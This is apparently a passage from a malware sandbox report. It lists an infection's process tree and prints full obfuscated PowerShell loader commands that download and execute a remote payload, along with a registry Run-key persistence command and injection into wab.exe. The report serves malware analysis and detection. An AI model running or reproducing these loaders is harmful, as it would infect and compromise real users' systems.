L,rigNig.r .nkha&Ableg&Jussi NondeAuthoc He,nhHimmeosa,gf Vrede$Boili ';Everlastingness (Toxicarol 'Pramd$CoquegSa.relRangfoKonfebN tteaSanktlN,cro:Kun,eSSign.t Treeo RecirRectilMe,taiData nLeuciiRespieSwimmtPsych=Bajon( Ma lcudbudmEmascdIlten Trnin/BummlcSuper Con $SouthK CooknBu.keaBl,kblSuccolSkideetapperEld eiFeazis ne ttResere Unesn TestsTenon) Blin ');Everlastingness (Toxicarol 'Doppe$bill gAkenolUnruioHolomb.heliaQui cl Udpo:blomkFUnriplGte kkLseglkconsteProl rGri,dnEthoxeCalen9Na.sk0Trenc=organ$ OffsR OvereHkkeoe .orhm spidb,lumpr ,melaBughocYder eDrejedIndop.Ph,nosBac,ep VerdlMon hi,anictDegne( Regi$fordlBAlfeda ReuplU,anasConopeSno.arKlage)Barbe ');$Reembraced=$Flkkerne90[0];Everlastingness (Toxicarol 'Tomle$UnstugMasselByplaoReprybP.oceaBe.allBo,bl:TypisXcut,vaBack.nRh.tatU,inth,ustsi SkinpAfru pStorteEra irSpytknViruleDenats oode=Te,reNAiluretem owStrin- AuroOSadisbNeurojInt,reCiv.lcHund t Magi BinfuS .usty MonosRodtetEndote Kom,mPrang.StnskNOutwieHammet Krys.fo,anW UdtyeRe,libRagliCArgenlAp.eli S.rieAp.rsnShowmtCy,nu ');Everlastingness (Toxicarol 'Udsej$SemirXal uva ousenSkabetBeatlh RetsipanthpFilstpResu eMac orRet,inEscale Capas Sven.MahjoHAlb cevend,aSikkedSkamseEnocyrAlle sSin,e[Montm$svmm,LmicrooChrisz Kap.eForudn s sogArb,je.atherfireo]Anapn=.xcen$.loamAbrugekUd,rit Ekspi.negivCam se H.lssDorsotUneve ');$Delflgens=Toxicarol 'undesXQurtiaOpdelnHespetInvalhpastoiEnergpDaarepStraneInhomrSti nnGan.eeFidelsA.hol.HenlgDSund,o u,arwRabien Overlriseno Mo eaDih,ddWort,FPolytiGaslol PacoeCover(E,ter$ ygnRPerspeTrevleNonnamReglebCh.tir Upsta,rettc rogre Antid Solo,Svejs$.subaB H,rnaLimonbResiseAsymtrDiassyRough) Over ';$Delflgens=$Storliniet[1]+$Delflgens;$Babery=$Storliniet[0];Everlastingness (Toxicarol 'An.gn$FnomegDokumlAalegoDown,bDagtiaHockelAtmos:PlasmDAut eiCrenacB,stihBlinkr TrstoMu chmatomiaP rcetMis.riTetracOssic=Coeta( AbonTHipsheklicksTranstunde,- ApogP,ippla SedutUligeh.ndtg Spids$AnalyBNitteagavekbHoodweLo,kirFacilyRaunc)Decor ');while (!$Dichromatic) {Everlastingness (Toxicarol 'Varia$BentogautoslDiadeo Ski bInc,ma Nonpl Joce: Sah.bbrandaammonaFlaglnTaxeadPolitvDuettvNewsreSatisnPylor=Theol$GeledtefterrProveuIngele ,jty ') ;Everlastingness $Delflgens;Everlastingness (Toxicarol 'VicarSCota,tErhveaAngrerbaktettiara-FyrtjS Counl ,leceAnb,feTrymap Acin T,ldb4Erthe ');Everlastingness (Toxicarol 'Ustil$ Tredg sildlTransod.skobSq.amaMydi,lPremu:Fe.skDSka,tiGasmaccassohS irirReleno pgramDesmoaIm,retS.periLy.rrcNonco= Krte(,rdsaTSprineDolces RetutBonm -InviaP LauraHarmatIlli,hSekit T.ion$ RoseBVintaaFlywhbOut.ie UralrLeaksyPanda)V.kar ') ;Everlastingness (Toxicarol 'den,i$,oublgFrperlplastoMu enb SmldamalcolSvige: Buk BTumbleVaticsPrdikkoutgayChartlEumerdMakken.mklaiSidevnIntelgPlaste Teutrunapp= With$VisaggOm.krlformyoTroldb auctaSolbrl,ryds: Ran,RHavn,a.lovnjTndstaObs,rb F ll+Orato+ Rati% Kula$Joks F A,yslGeni,k Rawlk pideBinokr C.ncnO.taee Unto9P.lar0Catal.RntgecKingboSandhuTeamwnAfkrvtAutog ') ;$Reembraced=$Flkkerne90[$Beskyldninger];}$Fortrdeligt=276508;$Elzevir=28490;Everlastingness (Toxicarol 'Skal.$ForhagReserl Bri oJeho,bBayadaFastflVgtfy:IngelDSuperi U.povAdveriIncons MilliThromoBetalnNa ursscamms ortytIrrenylib,lkF.arekpaarreA.klarRaffi Arc d=Cours LettiGUdskeeParamtReser-pre.sC Pr doBetonnNyctat.lideeLeuk,nSwit.tT,ien Fedt,$ virkBAlodiaGennebCrysteSp tnrHvledy C,sp ');Everlastingness (Toxicarol 'guine$Bortgg,drjelFernbo BvrebMdeafaBist,lU tra: PikaAM crot carbr Unr,oMorarpRee baEskadl Lngd G.ne=Gnocc Rais[OccipSEu,ogyGenn.sTra stSp nseOdourmBegyn. PorgCcunoioErg tnun nivUtraqe t.llr U,antCo,fi]Skatt:Baiss:M,ndaF.dofirkioskoBegynmSafiaB E shaTrawlsMal,tesuccu6 Disp4Lux mSNoctut .onorAnkeriRuskenPorthgCuvie(Riegg$AnhunD Filli Ratlv Metri,ackjsrhodoiSa,ono BekvnSup.rsDinossProc.tNonpeyMo,stkPs,rikKhedieEnounrM.net)impr. ');Everlastingness (Toxicarol 'Is,cy$,ispagMagmalPiacuoEmendbAutoeaBenvalPlopp:FlnsnFunderdAfstuesupervBarnaaDoctorPy.tee FurfgUnnomiRelapgLiteraSgninn strit.rodueNummen N.ndsBehnd Forz.=Ansva Hydr.[Su.erSGrabbyEntoms En etdupl e,ozjim Quin.SmagsTBebopeByggexBedmmtOligu.HelleE F.benTurnecAbciso ketcdAmy,oiSubwanEksorgAngos]Plott:Ende.: TerrABar,eSAb,ecC EvapIAmanuI Bore.DenerGG.likeSinditBe geSNedkrt Cr srRebooiDatasnto.chgFr mm(Conti$Stud.ATullit orserNaaleokit,bpU,veraZinkklFrste) Nota ');Everlastingness (Toxicarol 'Absci$ByplagKate.lLogaro Barib unloaMensalEnkel:,estiDSoleneMonisw .ammcOrakzlTentiaTi,uswDesc sJackw=H,sto$BestrFB,urpdBlindeDiplov Che.a skibrKoftee,odskg BygaiFormagTosidaNeddynDesigtAfgifeAfhjen placsKostu. EpicsSat uuVivipbEgenasVolustBlodkrVocabiDisv,n salagNonpu(Nidor$ValinFStbeno gemirS multBlastr.rimid .isseLandsl.unnii Sinkgs.vtjtPostt, Nons$Cinc,E Bridl te.rzC.arlebe.davba.thiInconr T.rn)coffi ');Everlastingness $Dewclaws;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Deddy.Dog && echo $"
4⤵
PID:1540

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Transplantationen% -w 1 $Honnrmarchs=(Get-ItemProperty -Path 'HKCU:\Leadenpated\').Jugoslavere;%Transplantationen% ($Honnrmarchs)"
5⤵
- Suspicious use of WriteProcessMemory
PID:5108

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Transplantationen% -w 1 $Honnrmarchs=(Get-ItemProperty -Path 'HKCU:\Leadenpated\').Jugoslavere;%Transplantationen% ($Honnrmarchs)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:5112

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bwyjuu.vbe"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4540

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Recompounds = 1;$Desarmere='Su';$Desarmere+='bstrin';$Desarmere+='g';Function Replant($Sacrocoxalgia){$Forsyningens=$Sacrocoxalgia.Length-$Recompounds;For($Gstetoilets=5;$Gstetoilets -lt $Forsyningens;$Gstetoilets+=6){$Modernitetens+=$Sacrocoxalgia.$Desarmere.Invoke( $Gstetoilets, $Recompounds);}$Modernitetens;}function Scorchproof($Bestraalingsfarernes){. ($Sejrtegns) ($Bestraalingsfarernes);}$Forvalterens=Replant 'AtwaiM LactomodifzK,mpliFilsllPrycel Kontai vol/Belej5 F,ti.K rch0 Spha Postt( L,sbWCovetiPinton Utrsd ontoo etalwTeks,sHel a Teg.eN sladTDoil. nomad1Subsk0Sy,ho.Appe.0Delib;Derel Fane WSanifiWantrnBoome6 U,de4 Forh;V rde ,ampgxTysk 6Stand4Scr e;Trans boplsr tenvPseud:Retfr1Husoh2foreb1Redep.Pilke0J,kfr) Fumi ekvipGklgetealkohc Ul.rkErhveoUnder/ Hu,m2Dalia0Sko e1 Phys0 Mi,e0 S,te1 Conv0anraa1Ex li D.xtrFSkuddipedalr SlipeRnkeffsnagao OrthxSnekk/Elek 1 Rast2Tykta1Rudek.Tatte0 ernb ';$Glossem=Replant 'TerzeUSuinasErg meLa.gur Tohe- N dkAN kebg,eltae T gmnshamptStemm ';$Samanid=Replant 'DimenhTextbtF.isttSkyggpTopwisFlame: Wind/Loese/Embryj Fa,soStudecSheencAttesuU inopEz.ipaTjenetEminei Stu.oDomkinKt.euaOfferl,rters Oms,cSmertiVenneeSanktn Loyac Planefireb.diplooSuc arCimmigS.bpo/LycopdSolinf orr/SeissSArro.o .mmavPu.virJalouarocksnbrus,.landbu lypt3Egnsp2 Osmo ';$Oxyosphresia=Replant 'Wools>Ritar ';$Sejrtegns=Replant 'unanai non eSanguxSnakk ';$Intelsat='Excite';Scorchproof (Replant 'ScarpSExsomeC,rrytRe,ac-Kitc,C ando SpisnKook,t Proceaff,lnFibrotKen,a Surre-MobilPSma.saSkindt PegehHyin embalT Cohu:Bortd\ .oozAF.rmidK,ltuvOve,seUn,obrOp.igbst.isi,fsbea .entldailii G ossP.eroeInitisSa.ia.blindtPrerex ,etrtDisin S ith-Di,meVRegnoaWormdl,ruenu S.ole Sys. urun$LasslI Twa n .atctLovmoe RyatlUd.ras.jertaGamettAvets; G.st ');Scorchproof (Replant ' Mon.iHalvffColon metat( Trelt Idioe.kspasHovedtQuaal- SnakpSki,gaMis,otForrehDisti D.nbrTPecti:Syste\Sure ARak tdStridvTrto,eAidmar Un nbMedikiAntitaUlvehl ThreiRhombsMahareTril,s Pr d.PointtBal.nxDameat Lo i)Ti.ra{Gtefoe De,exTrueliTidvitBundb}Slude;S mme ');$Faraoers = Replant ' stene H lkcAbe.dhOp.inoEnjo. Solda%UdsolaArnbepAtrofp ringdorinaaGra otSter a Shu % Cabr\ Skj.KKonvei Ver.oGe ets EncykSl rieGafnir Scransup ne Ungls Litt.Ch,rtBUnderd TunfeO.erm abonn& S rd&Karik KarakeOpmrkcEndeahEtnogoS,ppl Rende$A,anc ';Scorchproof (Replant 'Sletb$Streng LamplSndmsoPrincb Klgea Skr lg nec:Skjorvd,ggoiBeaanv RomaiGuarya.antenCadavnLstanasyste=S,nds(Mikrocgarbam Un edPeppe Smrok/ UncrcBotto Akad$irrenFS,ruba.lacerIm,ona Nat o U.sce InderIden.sWi.ch)A,leg ');Scorchproof (Replant 'Kanon$UfordgE,strl udvaoAutobbForriaBed rlKrabl:.oofiKSe.idaUnharmUhvispByggep,croil epta QuicdEns,lsVatik=ungue$InlanSJubilaAn.ism,kspeaHydronStetii SteadBaadf. gra s IntuptohunlCommeiSeptstMet o(Spa i$TerniOB.ignx ForsySubcaoPreadsVerdepJenaahHershr IntreFo.sks KadeiAftrdaPirst)Karto ');$Samanid=$Kampplads[0];Scorchproof (Replant 'kreol$Gri,ngGra elaflytoKd,ryb g.nsaTurbolScarv: PeriAThymieSpec rDysaro,pinobejendiMonopuSalatmFol,a=EpitaN MasceSkunkw Anim- Kr.gO.sserbPle sjVovh,eNy,ancPanartDistr AaregS B,khys.mats,pildtDimeteTawiemDrear.LackeNTrylle CaustMi cy.,atraWpse deBlustbAlcovC sainlAgammiRounde ,vernLokaltInfra ');Scorchproof (Replant ',esky$ AndeAHaycaeNau irVulgaoD agkbBlendiPaesau,ansemMecha.Non lHSydameGiganaThorgdSchote AnthrTangisUnbed[Musvi$Dags,GB abblGul.ioShu tsTo,alsMo,emeT,pklmAntic]Batik= Thor$ Del FHjertoko sird.monvEvysua C,mplFlirttCa.ioer.plirFascieRibz n DsigsHorns ');$Brachistocephalous=Replant 'SvendAHypereHerefrQuarto trskbConfeiAfsejuDatabm Synt.Ste rDudbraoForsyw obbenUndsel MiswoSusp aGastrd EvolFOvergiHardblNinnieM,rki(Anoma$EsrogSBrkveaSkitsmFunktaLig mnAandfiCountdBispo,Befir$ SpheF HusklH tera,bloqmAnapsm,rygte TankkUxor.aTotessSknhetDreyleDrki rPossenMi.sae buse)Mi,es ';$Brachistocephalous=$vivianna[1]+$Brachistocephalous;$Flammekasterne=$vivianna[0];Scorchproof (Replant 'Philh$quaesg Fortl s ruo Nip,bM.triaSym.alOutch:EmaljT DaasoEnsn.rSebrisSaxoshUnobsaDirekm TresmHajjieriskirTwiggeCanasnExtin2 Udva3Udvet=Dem.r(AttraTGenneeDunhasHyetotWhere- MeriPA.tenaProsotKlokkh Opko Instr$ E.skFVselhl ,steaStomom trakm TacleFjernk Pusta StrasRapaktUnlaue mbitrRescons.rcoeGan u)Pa.ad ');while (!$Torshammeren23) {Scorchproof (Replant ' etru$ dfalg NeoclFlommo Col bMistaaUncrul Ind.:HmskoDF,ankaHaandtNste.aDispueTampolAfvrgeSynsrmFeteleBrandnAc.tetbo geeSeabir Shed=.erkn$udenotSubrorlsesuuSalmeePund ') ;Scorchproof $Brachistocephalous;Scorchproof (Replant 'CreanSSul,at uffia LeddrSyrert Nema-CulmeS DechlCakeweZoneie sarop Albu Raads4Em,eo ');Scorchproof (Replant 'Saliv$FeighgVokallsi.emo Fartbovergavaerkl Mirl:TidssTSnoozoVend,rFavorsMonochSpeciaPo.simvelo.mUdp neAaretrTran.e .onfn,esea2.rown3Forse=Expre(T rnzTFljlse Msous Re,btCommi-FuglePArchiaUnco.tBikubhCorp, Indig$ angpF.istelRes.saTachom Manim F rseOldtikS,ydeaIdolis,bssktEq,ateCuailrUnt.rnTarogeKomme)Affri ') ;Scorchproof (Replant ' Addy$malmhgTrissl DenioBr.teb NummaBrevsl Del,:CoppeIAtossnR.aprt nbrae StyrrGeodtrFor,yoStartg .seuaMetast orhaiTegltoForbrnBeded=Radic$Ku sugPlum,lUnelioTandpbTr.adaherpelRerou:ColonMAffiroformubOverfi TrnglMi,dstarieteCommolElevae Un,tfBi.lbo BemrnGedde+ Af s+soffi%Erh.e$ walcK VitraDebonmRes dpB ligpSannyl Miljaggl rdStewas Mart.soignc FluioMedleutiponnDec ltJettr ') ;$Samanid=$Kampplads[$Interrogation];}$Electronic=289196;$Uncombable57=29209;Scorchproof (Replant ' Hate$Stik.g Dub,lIldsloExpedb Porta RelilForsk:FastiS DitmnUdnvnaSk.alt.rinccKo.fehHold,iPolyaeRad.rsTwisttIrrev Unex= Tant FortyGTref ejugostP,ral-G dtrCGardeoYogasnPis etF.rkre Skagn C,xotHerti Verif$Synf FAandslReordaKandim B,armtaffee PrimkSmoula,dstbsInuret DeuteKk.enrVindunSeleneComor ');Scorchproof (Replant 'adele$Bolsjgmammolna,leo F.rrb Torna Rejulluvsi:VilifUBlowsdSvarttpaatna SekulSkrueeTrailrSvejt Lovmo=Outwa Frank[StupeS Galey f,avsBu mutKompaeUncremkv,te. InbuCDybdeo SixmnAntenvmwkv.e R.hyrteg ftRhamn]nitro: andr:JimmsFBingerb.osyoUnascm TvanBBetoraCoi fs kudheDi.om6Koppe4FirspSPeliktBrnderpoachiSp,gen SephgD.spa(Pepti$DopstSInco.nStomaa Pel.tTransc PrakhVelk i VitaeAarets.ltratStryc) Teki ');Scorchproof (Replant 'Pl gi$Eur,pgIdepolConcioHajenb UnbraInfanlSipes:GlycoGLaburiDive gIn,esaHoveddgeneroGenneiA optdacrop S,amk=Vitro Symph[Co trSDrbelysivaisPterotZambieMotormUngal. ,irdTEkstreCos ox,dolotPaah . LeisEComaen,oilecubetioSpiondEvinsiskppenTestag Hyst]Rubel: Guld:sheraAW.dneSLuftiC HoneIFors ICaraj.RumltGSemieeDmr.dtInt sSPrkentReinvrKon.miC.uddnHonorgLonel(Sanik$ AsieU Salad.ynrht Misca B,trl Eleve SerprGaded).eesk ');Scorchproof (Replant 'ideal$jor.lgGranglForskoBlencbInstra Demilcopss:BelnnPYndigiuntrag,rmistUdmagaAntimiLba sl eese KryddDispr=Cycla$BlephGPro.uiJan,zg Pe,saUn amdobumboColuri AfladTotal.AnalysForm.ukyllibSolvesTrykftSkrotrF emhiDybdenSkrp g Kai,(Neutr$SphaeEBlurtl Ac,eeCountcLevittAtalarPapi.o misanabst i HyetcTesti,blind$SanitU ElonnVerilc,lyanoBlesdm PreabPos.ba Downb For,lDayloe Papa5Gorsk7Kredi)Hirsl ');Scorchproof $Pigtailed;"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:832

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kioskernes.Bde && echo $"
7⤵
PID:1844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Recompounds = 1;$Desarmere='Su';$Desarmere+='bstrin';$Desarmere+='g';Function Replant($Sacrocoxalgia){$Forsyningens=$Sacrocoxalgia.Length-$Recompounds;For($Gstetoilets=5;$Gstetoilets -lt $Forsyningens;$Gstetoilets+=6){$Modernitetens+=$Sacrocoxalgia.$Desarmere.Invoke( $Gstetoilets, $Recompounds);}$Modernitetens;}function Scorchproof($Bestraalingsfarernes){. ($Sejrtegns) ($Bestraalingsfarernes);}$Forvalterens=Replant 'AtwaiM LactomodifzK,mpliFilsllPrycel Kontai vol/Belej5 F,ti.K rch0 Spha Postt( L,sbWCovetiPinton Utrsd ontoo etalwTeks,sHel a Teg.eN sladTDoil. nomad1Subsk0Sy,ho.Appe.0Delib;Derel Fane WSanifiWantrnBoome6 U,de4 Forh;V rde ,ampgxTysk 6Stand4Scr e;Trans boplsr tenvPseud:Retfr1Husoh2foreb1Redep.Pilke0J,kfr) Fumi ekvipGklgetealkohc Ul.rkErhveoUnder/ Hu,m2Dalia0Sko e1 Phys0 Mi,e0 S,te1 Conv0anraa1Ex li D.xtrFSkuddipedalr SlipeRnkeffsnagao OrthxSnekk/Elek 1 Rast2Tykta1Rudek.Tatte0 ernb ';$Glossem=Replant 'TerzeUSuinasErg meLa.gur Tohe- N dkAN kebg,eltae T gmnshamptStemm ';$Samanid=Replant 'DimenhTextbtF.isttSkyggpTopwisFlame: Wind/Loese/Embryj Fa,soStudecSheencAttesuU inopEz.ipaTjenetEminei Stu.oDomkinKt.euaOfferl,rters Oms,cSmertiVenneeSanktn Loyac Planefireb.diplooSuc arCimmigS.bpo/LycopdSolinf orr/SeissSArro.o .mmavPu.virJalouarocksnbrus,.landbu lypt3Egnsp2 Osmo ';$Oxyosphresia=Replant 'Wools>Ritar ';$Sejrtegns=Replant 'unanai non eSanguxSnakk ';$Intelsat='Excite';Scorchproof (Replant 'ScarpSExsomeC,rrytRe,ac-Kitc,C ando SpisnKook,t Proceaff,lnFibrotKen,a Surre-MobilPSma.saSkindt PegehHyin embalT Cohu:Bortd\ .oozAF.rmidK,ltuvOve,seUn,obrOp.igbst.isi,fsbea .entldailii G ossP.eroeInitisSa.ia.blindtPrerex ,etrtDisin S ith-Di,meVRegnoaWormdl,ruenu S.ole Sys. urun$LasslI Twa n .atctLovmoe RyatlUd.ras.jertaGamettAvets; G.st ');Scorchproof (Replant ' Mon.iHalvffColon metat( Trelt Idioe.kspasHovedtQuaal- SnakpSki,gaMis,otForrehDisti D.nbrTPecti:Syste\Sure ARak tdStridvTrto,eAidmar Un nbMedikiAntitaUlvehl ThreiRhombsMahareTril,s Pr d.PointtBal.nxDameat Lo i)Ti.ra{Gtefoe De,exTrueliTidvitBundb}Slude;S mme ');$Faraoers = Replant ' stene H lkcAbe.dhOp.inoEnjo. Solda%UdsolaArnbepAtrofp ringdorinaaGra otSter a Shu % Cabr\ Skj.KKonvei Ver.oGe ets EncykSl rieGafnir Scransup ne Ungls Litt.Ch,rtBUnderd TunfeO.erm abonn& S rd&Karik KarakeOpmrkcEndeahEtnogoS,ppl Rende$A,anc ';Scorchproof (Replant 'Sletb$Streng LamplSndmsoPrincb Klgea Skr lg nec:Skjorvd,ggoiBeaanv RomaiGuarya.antenCadavnLstanasyste=S,nds(Mikrocgarbam Un edPeppe Smrok/ UncrcBotto Akad$irrenFS,ruba.lacerIm,ona Nat o U.sce InderIden.sWi.ch)A,leg ');Scorchproof (Replant 'Kanon$UfordgE,strl udvaoAutobbForriaBed rlKrabl:.oofiKSe.idaUnharmUhvispByggep,croil epta QuicdEns,lsVatik=ungue$InlanSJubilaAn.ism,kspeaHydronStetii SteadBaadf. gra s IntuptohunlCommeiSeptstMet o(Spa i$TerniOB.ignx ForsySubcaoPreadsVerdepJenaahHershr IntreFo.sks KadeiAftrdaPirst)Karto ');$Samanid=$Kampplads[0];Scorchproof (Replant 'kreol$Gri,ngGra elaflytoKd,ryb g.nsaTurbolScarv: PeriAThymieSpec rDysaro,pinobejendiMonopuSalatmFol,a=EpitaN MasceSkunkw Anim- Kr.gO.sserbPle sjVovh,eNy,ancPanartDistr AaregS B,khys.mats,pildtDimeteTawiemDrear.LackeNTrylle CaustMi cy.,atraWpse deBlustbAlcovC sainlAgammiRounde ,vernLokaltInfra ');Scorchproof (Replant ',esky$ AndeAHaycaeNau irVulgaoD agkbBlendiPaesau,ansemMecha.Non lHSydameGiganaThorgdSchote AnthrTangisUnbed[Musvi$Dags,GB abblGul.ioShu tsTo,alsMo,emeT,pklmAntic]Batik= Thor$ Del FHjertoko sird.monvEvysua C,mplFlirttCa.ioer.plirFascieRibz n DsigsHorns ');$Brachistocephalous=Replant 'SvendAHypereHerefrQuarto trskbConfeiAfsejuDatabm Synt.Ste rDudbraoForsyw obbenUndsel MiswoSusp aGastrd EvolFOvergiHardblNinnieM,rki(Anoma$EsrogSBrkveaSkitsmFunktaLig mnAandfiCountdBispo,Befir$ SpheF HusklH tera,bloqmAnapsm,rygte TankkUxor.aTotessSknhetDreyleDrki rPossenMi.sae buse)Mi,es ';$Brachistocephalous=$vivianna[1]+$Brachistocephalous;$Flammekasterne=$vivianna[0];Scorchproof (Replant 'Philh$quaesg Fortl s ruo Nip,bM.triaSym.alOutch:EmaljT DaasoEnsn.rSebrisSaxoshUnobsaDirekm TresmHajjieriskirTwiggeCanasnExtin2 Udva3Udvet=Dem.r(AttraTGenneeDunhasHyetotWhere- MeriPA.tenaProsotKlokkh Opko Instr$ E.skFVselhl ,steaStomom trakm TacleFjernk Pusta StrasRapaktUnlaue mbitrRescons.rcoeGan u)Pa.ad ');while (!$Torshammeren23) {Scorchproof (Replant ' etru$ dfalg NeoclFlommo Col bMistaaUncrul Ind.:HmskoDF,ankaHaandtNste.aDispueTampolAfvrgeSynsrmFeteleBrandnAc.tetbo geeSeabir Shed=.erkn$udenotSubrorlsesuuSalmeePund ') ;Scorchproof $Brachistocephalous;Scorchproof (Replant 'CreanSSul,at uffia LeddrSyrert Nema-CulmeS DechlCakeweZoneie sarop Albu Raads4Em,eo ');Scorchproof (Replant 'Saliv$FeighgVokallsi.emo Fartbovergavaerkl Mirl:TidssTSnoozoVend,rFavorsMonochSpeciaPo.simvelo.mUdp neAaretrTran.e .onfn,esea2.rown3Forse=Expre(T rnzTFljlse Msous Re,btCommi-FuglePArchiaUnco.tBikubhCorp, Indig$ angpF.istelRes.saTachom Manim F rseOldtikS,ydeaIdolis,bssktEq,ateCuailrUnt.rnTarogeKomme)Affri ') ;Scorchproof (Replant ' Addy$malmhgTrissl DenioBr.teb NummaBrevsl Del,:CoppeIAtossnR.aprt nbrae StyrrGeodtrFor,yoStartg .seuaMetast orhaiTegltoForbrnBeded=Radic$Ku sugPlum,lUnelioTandpbTr.adaherpelRerou:ColonMAffiroformubOverfi TrnglMi,dstarieteCommolElevae Un,tfBi.lbo BemrnGedde+ Af s+soffi%Erh.e$ walcK VitraDebonmRes dpB ligpSannyl Miljaggl rdStewas Mart.soignc FluioMedleutiponnDec ltJettr ') ;$Samanid=$Kampplads[$Interrogation];}$Electronic=289196;$Uncombable57=29209;Scorchproof (Replant ' Hate$Stik.g Dub,lIldsloExpedb Porta RelilForsk:FastiS DitmnUdnvnaSk.alt.rinccKo.fehHold,iPolyaeRad.rsTwisttIrrev Unex= Tant FortyGTref ejugostP,ral-G dtrCGardeoYogasnPis etF.rkre Skagn C,xotHerti Verif$Synf FAandslReordaKandim B,armtaffee PrimkSmoula,dstbsInuret DeuteKk.enrVindunSeleneComor ');Scorchproof (Replant 'adele$Bolsjgmammolna,leo F.rrb Torna Rejulluvsi:VilifUBlowsdSvarttpaatna SekulSkrueeTrailrSvejt Lovmo=Outwa Frank[StupeS Galey f,avsBu mutKompaeUncremkv,te. InbuCDybdeo SixmnAntenvmwkv.e R.hyrteg ftRhamn]nitro: andr:JimmsFBingerb.osyoUnascm TvanBBetoraCoi fs kudheDi.om6Koppe4FirspSPeliktBrnderpoachiSp,gen SephgD.spa(Pepti$DopstSInco.nStomaa Pel.tTransc PrakhVelk i VitaeAarets.ltratStryc) Teki ');Scorchproof (Replant 'Pl gi$Eur,pgIdepolConcioHajenb UnbraInfanlSipes:GlycoGLaburiDive gIn,esaHoveddgeneroGenneiA optdacrop S,amk=Vitro Symph[Co trSDrbelysivaisPterotZambieMotormUngal. ,irdTEkstreCos ox,dolotPaah . LeisEComaen,oilecubetioSpiondEvinsiskppenTestag Hyst]Rubel: Guld:sheraAW.dneSLuftiC HoneIFors ICaraj.RumltGSemieeDmr.dtInt sSPrkentReinvrKon.miC.uddnHonorgLonel(Sanik$ AsieU Salad.ynrht Misca B,trl Eleve SerprGaded).eesk ');Scorchproof (Replant 'ideal$jor.lgGranglForskoBlencbInstra Demilcopss:BelnnPYndigiuntrag,rmistUdmagaAntimiLba sl eese KryddDispr=Cycla$BlephGPro.uiJan,zg Pe,saUn amdobumboColuri AfladTotal.AnalysForm.ukyllibSolvesTrykftSkrotrF emhiDybdenSkrp g Kai,(Neutr$SphaeEBlurtl Ac,eeCountcLevittAtalarPapi.o misanabst i HyetcTesti,blind$SanitU ElonnVerilc,lyanoBlesdm PreabPos.ba Downb For,lDayloe Papa5Gorsk7Kredi)Hirsl ');Scorchproof $Pigtailed;"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kioskernes.Bde && echo $"
8⤵
PID:1276

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1324

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\qwpjbc.vbe"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Capulin = 1;$Kontakia='Su';$Kontakia+='bstrin';$Kontakia+='g';Function blodaaren($Fjernvarmecentralens){$Repudiation=$Fjernvarmecentralens.Length-$Capulin;For($Flocci=5;$Flocci -lt $Repudiation;$Flocci+=6){$Acidy+=$Fjernvarmecentralens.$Kontakia.Invoke( $Flocci, $Capulin);}$Acidy;}function unormaliteter($Urocoptis116){& ($Politivedtaegt35) ($Urocoptis116);}$Applikationsudvikleres=blodaaren 'DermaMT,baloNuncuzFlestiSkretl ,nellUdhunaUpgro/Still5Nonbo.Saute0Sexfi Raaka(DatadWTil.viPosi,n TromdSpu,soWreckwCon hsCreti CatguNDisclTtr.ll Super1Bo db0Re,ub.urete0commo;Rough decigWDetaii vitan arne6Bille4Sam e; Skri Udp bxC,rpu6Reedh4Suici;F ltr Skrfer in,evErika:Ho.iz1She t2fengh1In.ro. Rum.0Unde.)Inaug JuditG Antie st,icholmikBeboeo ovje/Exter2Molot0Lenit1.illf0Elide0Raw.n1Miljb0Biote1 Knog KmpegFSatsbiskrifrRegaleDescef.ovedo Sk dxSkai./ Halv1Gleam2 Afte1 Voms.Spaak0Svane ';$Uigennemskuelighedernes=blodaaren 'archiUEndossFdekae astrr Sulf- SjofA P osgSluseeAndennWard,t,essp ';$Manlily=blodaaren 'affu hPlangt selst,rinepindr,s erin:Henle/ .ygr/HeptarElvera Redin s,vsc A,ulhStylio hildbCa.aloStransOptagcRoyalaCorrarL.febdForhaiPa ten v,di. 